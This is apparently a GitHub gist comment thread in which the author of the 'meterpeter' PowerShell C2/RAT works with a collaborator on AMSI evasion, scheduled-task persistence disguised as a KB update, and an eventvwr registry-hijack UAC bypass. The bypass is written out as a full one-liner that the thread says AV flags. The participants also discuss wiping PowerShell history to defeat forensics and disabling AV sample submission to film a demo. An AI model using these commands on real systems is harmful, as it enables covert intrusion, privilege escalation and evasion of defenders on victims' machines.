-
-
Save r00t-3xp10it/13e1bd5c657a1bd38bdf0a82d0e63309 to your computer and use it in GitHub Desktop.
Amsi Evasion |
Or more tests✅💯🔥
iam current adding a privilege escalation module to it (SDCLT) ..
Remmenber that this bypass technic its only valid for the current process console ..
(If you open another console then AMSI will be active and working)
Oh wow, nice ✅💯🔥, thank you, Learning a lot from you thank you!
you can have the latest version of meterpeter here: https://github.com/r00t-3xp10it/meterpeter
Cool adding link to Meterpeter vid✅💯🔥
iam having problems to triger SDCLT priv escal ...
so.. iam going with this one 'enigma_fileless_uac_bypass.rb' that i know it works (tomorrow)...
https://github.com/r00t-3xp10it/msf-auxiliarys/blob/master/windows/local-privilege-escalation/enigma_fileless_uac_bypass.rb
hey @codings9 look at this one that ive just discorver ... (pure luck) ...
while testing meterpeter [search for passwors in text files] ....
i have notest one file thats storing all commands beeing executed in powershell by meterpeter client or simple by using ps prompt...
LOOK AT THE AMOUNT OF INFO THAT THIS FILE CONTAINS ABOUT PS CONSOLE PROCESS...UAU ..IT AS THE ALL SCRIPT STORED..
"Iam i think to myselft from one forensic prespective" ... BUSTED ...
so... i imediatly reacted to this thread ... by... rewriting the contents of that file in modules like [dellogs] or [listpass] ...
🥇
Wow, that’s amazing✅💯🔥, so powershell keeps logs?
In ConsoleHost_History-wow great catch
note-to-self (priv escal in persistence)
1 - persistence schedule every 10 minuts
schtasks /create /sc minute /mo 10 /tn "taskname" /tr %tmp%\update-KB132645.vbs
2 - privilege escalation using filess eventvwr technic
- a) add hkcu key poiting to client trigger.vbs file
- b) scheldule start eventvwr every 10 minuts
- schtasks at restart will start eventvwr, eventvwr starts client trigger.vbs, client starts with SYSTEM privileges .. <- we just need to restart target, start meterpeter listenner to wait for connection ...
New-ItemProperty HKCU\...\trigger-Client.vbs
schtasks .... eventvwr.exe
3 - restart target machine
4 - start meterpeter to recive SYSTEM connection
Privilege Escalation in one line (oneliner)
- 1º - reg add HKCU.. /d 'PS command to start client.ps1'
'This reg key will auto-elevate to SYSTEM the child process spawned (Client.ps1)' ..- 2º - Schedule task to start eventvwr.exe every xx minuts (defined by attacker)
'This Function allow us to have time to restart meterpeter to recive the connection again from Client'- 3º - Restart meterpeter to recive the SYSTEM connection back
'This function will also alow us to persiste our payload, the diferense its that Client will beacon home from xx to xx minuts compared with the other meterpeter persiste modules'
- 3º - Restart meterpeter to recive the SYSTEM connection back
- 2º - Schedule task to start eventvwr.exe every xx minuts (defined by attacker)
$Command = "cmd /R REG ADD 'HKCU\Software\Classes\mscfile\shell\open\command' /ve /t REG_SZ /d 'cmd /R powershell -Execution Bypass -w 1 -NoProfile -File %tmp%\Update-KB4524147.ps1';schtasks /create /sc minute /mo $stime /tn `"KB4524147`" /tr `"%windir%\system32\eventvwr.exe`";schtasks /Query /tn `"KB4524147`" `> dellog.txt;write-host "`n`n" `>`> dellog.txt;echo `" Privilege Escalation beacons every: $stime (minuts)`" `>`> dellog.txt;echo `" Restart 'meterpeter' to recive the SYSTEM connection.`" `>`> dellog.txt;Get-Content dellog.txt;Remove-Item dellog.txt -Force";
IT DOES NOT WORK: AV FLAGS THIS REGKEY ....
Hey @codings9 iam porting meterpeter project to venom ..
i need you to test something for me ...
- execute in bash terminal
which powershell
And report back if this command checks for powershell install under Linux distros
- Question: did you required to do
chmod +x meterpeter.ps1
????
Hey @codings9 iam porting meterpeter project to venom ..
i need you to test something for me ...
execute in bash terminal
which powershell
which powershell does not execute.
To execute powershell in Kali i have to use
pwsh to get the powershell, shell.
And report back if this command checks for powershell install under Linux distros
Question: did you required to do chmod +x meterpeter.ps1 ????
No, Not required under pwsh.
Reference:
https://youtu.be/CmMbWmN246E
When you execute which powershell
in the BASH terminal .. whats the response ???
I dont want to start powershell (which present appl installed full path)
check this locations.
/usr/bin/pwsh
/opt/microsoft/powershell
/usr/local/share/powershell/Modules
/usr/bin/pwsh
Exists, they reference powershell as pwsh😂🤣
So we are looking for pwsh not powershell, lol
which pwsh?
/usr/bin/pwsh
exelent ...
which pwsh?
/usr/bin/pwsh
i need to know if venom user was powershell installed before running meterpeter.ps1 .. <--- checking the existence of this folder works fine..
and i need to know if attacker its x64 bits arch (M$ does not give PS to x32 bits) .. <--- already done ..
Sweet✅💯🔥
TASK
- Record 'meterpeter' [Window vs Windows] oficial release video ..
Task Description
hey @codings9 i need your help again ...
To record a video tutorial about 'meterpeter' windows VS Windows ...
using the 'new terminal windows' configurated to run meterpeter tool ..
New Windows Terminal (M$)
Step-By-Step
- 1º - Download new meterpeter project (oficial release)
git clone https://github.com/r00t-3xp10it/meterpeter.git
-
2º - Install new windows terminal
Install new windows terminal (Under Windows Distros
) -
3º - download/install new microsoft font (Cascadia.ttf)
Microsoft Cascadia code Font -
4º - Add meterpeter tool to the new terminal TAB list
Remenber to change the PATHs
to point to your Local meterpeter installation
1º - Create a new GUID for meterpeter tool
To Creat new GUID visit: http://new-guid.com/
2º - press <'settings'> button in 'new terminal' and copy paste the follow code under
"profiles": -> "list":
}, // <-- REMMENBER TO ADD , IN PREVIOUS CLOSE BRACKLETS FUNCTION ...
// BEFORE ADDING A NEW FUNCTION TO YOUR PROFILE.JSON FILE
{
// Make changes here to the meterpeter profile
"guid": "{1972e6a7-daef-4cfc-8180-3eecfef9630d}",
"name": "meterpeter C2",
"fontFace": "Cascadia Code",
"backgroundImageStretchMode" : "uniformToFill",
"backgroundImage" : "%USERPROFILE%\\Desktop\\meterpeter\\mimiRatz\\darkside.gif", // <-- Terminal animated background gif Path
"commandline": "powershell.exe -ExecutionPolicy Bypass -NoLogo -NoExit -File \"%USERPROFILE%\\Desktop\\meterpeter\\meterpeter.ps1\"", // <-- meterpeter.ps1 script Path
"startingDirectory" : "%USERPROFILE%\\Desktop\\meterpeter", // <-- meterpeter folder Path
"icon" : "%USERPROFILE%\\Desktop\\meterpeter\\mimiRatz\\Alien-icon.png", // <-- Terminal tab icon Path
"hidden": false
}
[i] my profile.json file (Configuration example
)
[i] meterpeter WIKI pages
Doing the video, just be aware that ps1 file was not downloaded via the bat- i manually moved it to disk and ran it. And Windows picks up the file soon as it touches disk, sample submission off. I had to allow it for the video-I think i understand why Microsoft bought github...now...they have access to all of this...code....Don’t worry will not show on video.
The Terminal is amazing love the integration with MeterPeter✅💯🔥
hey thanks ..ive just arrived home ..
Lol, no worries anytime...✅💯🔥, thank you!
👍
Let me know when I can do video✅💯🔥